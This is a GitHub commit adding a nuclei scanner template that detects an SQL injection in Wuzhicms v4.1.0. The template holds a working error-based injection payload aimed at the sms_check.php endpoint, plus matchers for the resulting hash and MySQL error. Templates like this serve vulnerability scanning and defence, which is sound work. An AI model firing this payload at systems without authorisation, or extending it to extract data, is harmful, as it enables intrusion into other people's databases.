Merge pull request #1346 from projectdiscovery/princechaddha-patch-11

Create wuzhicms-sqli.yaml
patch-1
Prince Chaddha 2021-05-05 23:30:36 +05:30 committed by GitHub
commit e87baf2967
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: wuzhicms-sqli
info:
name: Wuzhicms v4.1.0 SQL Injection
author: princechaddha
severity: high
reference: https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "81dc9bdb52d04dc20036dbd8313ed05"
- "sql_error:MySQL Query Error"
part: body
condition: and